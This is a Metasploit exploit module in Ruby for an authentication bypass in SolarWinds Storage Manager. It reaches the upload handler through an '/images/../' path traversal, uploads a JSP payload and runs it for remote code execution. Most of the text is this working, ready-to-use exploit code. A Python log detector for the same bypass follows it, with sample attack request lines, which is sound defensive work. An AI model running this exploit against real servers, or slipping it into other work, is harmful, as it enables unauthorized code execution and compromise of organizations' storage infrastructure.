SolarWinds Storage Manager Authentication Bypass
Source: metasploit.com  Author: rgod  Published: 2014-09-12
```ruby
##
# This module requires Metasploit: http://metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##

require 'msf/core'

class Metasploit3 < Msf::Exploit::Remote
  Rank = ExcellentRanking

  include Msf::Exploit::Remote::HttpClient
  include Msf::Exploit::FileDropper

  def initialize(info = {})
    super(update_info(info,
      'Name'           => 'SolarWinds Storage Manager Authentication Bypass',
      'Description'    => %q{
        This module exploits an authentication bypass vulnerability in Solarwinds
        Storage Manager. The vulnerability exists in the AuthenticationFilter, which
        allows authentication to be bypassed with specially crafted URLs. After
        bypassing authentication, it is possible to use a file upload function to
        achieve remote code execution. This module has been tested successfully in
        Solarwinds Store Manager Server 5.1.0 and 5.7.1 on Windows 32 bits,
        Windows 64 bits and Linux 64 bits operating systems.
      },
      'Author'         =>
        [
          'rgod',         # Vulnerability Discovery
          'juan vazquez'  # Metasploit module
        ],
      'License'        => MSF_LICENSE,
      'References'     =>
        [
          ['ZDI', '14-299']
        ],
      'Privileged'     => true,
      'Platform'       => %w{ linux win },
      'Arch'           => ARCH_JAVA,
      'Targets'        =>
        [
          ['Solarwinds Store Manager <= 5.7.1', {}]
        ],
      'DefaultTarget'  => 0,
      'DisclosureDate' => 'Aug 19 2014'))

    register_options(
      [
        Opt::RPORT(9000)
      ], self.class)
  end

  # Probe the upload handler through the "/images/.." prefix that the
  # AuthenticationFilter lets through; a success banner means the filter was skipped.
  def check
    res = send_request_cgi({
      'uri'    => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"),
      'method' => 'POST',
      'ctype'  => "multipart/form-data; boundary=----#{rand_text_alpha(10 + rand(10))}"
    })

    if res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/
      return Exploit::CheckCode::Vulnerable
    end

    Exploit::CheckCode::Safe
  end

  def exploit
    # First JSP only reports the web root so uploaded files can be cleaned up later.
    jsp_info = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
    print_status("#{peer} - Uploading Information Gathering JSP #{jsp_info}...")
    if upload(jsp_info, jsp_path)
      print_good("#{peer} - JSP payload uploaded successfully")
    else
      fail_with(Failure::Unknown, "#{peer} - Information Gathering JSP upload failed")
    end

    res = execute(jsp_info)
    if res && res.code == 200 && res.body.to_s =~ /Path:(.*)/
      upload_path = $1
      print_good("#{peer} - Working directory found in #{upload_path}")
      register_file_for_cleanup(::File.join(upload_path, jsp_info))
    else
      print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required")
      print_warning("#{peer} - #{jsp_info} needs to be deleted manually")
    end

    jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
    print_status("#{peer} - Uploading JSP payload #{jsp_payload}...")
    if upload(jsp_payload, payload.encoded)
      print_good("#{peer} - JSP payload uploaded successfully")
    else
      fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
    end

    if upload_path
      register_file_for_cleanup(::File.join(upload_path, jsp_payload))
    else
      print_warning("#{peer} - #{jsp_payload} needs to be deleted manually")
    end

    print_status("#{peer} - Executing payload...")
    execute(jsp_payload, 1)
  end

  # Request an uploaded JSP through the same unauthenticated prefix.
  def execute(jsp_name, time_out = 20)
    res = send_request_cgi({
      'uri'    => normalize_uri("/", "images", "..", jsp_name),
      'method' => 'GET'
    }, time_out)

    res
  end

  # Multipart upload to ProcessFileUpload.jsp; returns true on the success banner.
  def upload(file_name, contents)
    post_data = Rex::MIME::Message.new
    post_data.add_part(contents, "application/octet-stream", nil, "form-data; name=\"#{rand_text_alpha(4 + rand(4))}\"; filename=\"#{file_name}\"")

    res = send_request_cgi({
      'uri'    => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"),
      'method' => 'POST',
      'ctype'  => "multipart/form-data; boundary=#{post_data.bound}",
      'data'   => post_data.to_s
    })

    if res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/
      return true
    end

    false
  end

  def jsp_path
    jsp =<<-EOS
<%@ page language="Java" import="java.util.*"%>
<% out.println("Path:" + System.getProperty("server.webapp.root")); %>
    EOS

    jsp
  end
end
```
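The module reaches the protected upload handler by requesting it under the unauthenticated `/images/` prefix with a `..` segment, so a defender can spot this class of bypass by comparing the raw request path with its resolved form. The following detector is an added example, not part of the page or the Metasploit module; it assumes Common Log Format access logs and that the container resolves `..` the way `posixpath.normpath` does, and the sample lines are constructed.

```python
import re
from posixpath import normpath

# Constructed sample access-log lines (Common Log Format); not taken from the page.
SAMPLE_LOG = """\
10.0.0.5 - - [12/Sep/2014:10:01:02 +0000] "GET /images/logo.png HTTP/1.1" 200 512
10.0.0.9 - - [12/Sep/2014:10:01:07 +0000] "POST /images/../jsp/ProcessFileUpload.jsp HTTP/1.1" 200 1024
10.0.0.9 - - [12/Sep/2014:10:01:09 +0000] "GET /images/../a7Kd.jsp HTTP/1.1" 200 77
10.0.0.7 - - [12/Sep/2014:10:02:00 +0000] "GET /jsp/login.jsp HTTP/1.1" 200 2048
"""

LOG_RE = re.compile(
    r'^(?P<ip>\S+) \S+ \S+ \[(?P<ts>[^\]]+)\] '
    r'"(?P<method>[A-Z]+) (?P<uri>\S+) [^"]*" (?P<status>\d{3})'
)

# Prefix the module requests under to skip the AuthenticationFilter (from the module).
UNAUTH_PREFIXES = ("/images/",)
UPLOAD_HANDLER = "/jsp/ProcessFileUpload.jsp"

def resolve(uri):
    """Collapse '.' and '..' segments the way the servlet container does for dispatch."""
    return normpath(uri.split("?", 1)[0])

def is_traversal_bypass(uri):
    """Raw path sits under an unauthenticated prefix, but after resolving '..' it does not."""
    raw = uri.split("?", 1)[0]
    if not raw.startswith(UNAUTH_PREFIXES) or ".." not in raw.split("/"):
        return False
    return not resolve(raw).startswith(UNAUTH_PREFIXES)

def scan_log(text):
    """Return flagged requests plus per-IP verdicts (upload handler reached, JSP executed)."""
    hits, by_ip = [], {}
    for line in text.splitlines():
        m = LOG_RE.match(line)
        if not m or not is_traversal_bypass(m["uri"]):
            continue
        hit = {"ip": m["ip"], "method": m["method"], "uri": m["uri"],
               "resolved": resolve(m["uri"]), "status": int(m["status"])}
        hits.append(hit)
        v = by_ip.setdefault(hit["ip"], {"upload": False, "exec": False})
        if hit["method"] == "POST" and hit["resolved"] == UPLOAD_HANDLER and hit["status"] == 200:
            v["upload"] = True
        elif hit["method"] == "GET" and hit["resolved"].endswith(".jsp") and v["upload"]:
            v["exec"] = True  # a JSP fetched after a successful upload from the same source
    return hits, by_ip

if __name__ == "__main__":
    for h in scan_log(SAMPLE_LOG)[0]:
        print(h)
```

The same raw-versus-resolved comparison belongs in the filter itself: an authentication filter that matches on the unnormalized request URI is exactly what this bypass relies on.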
 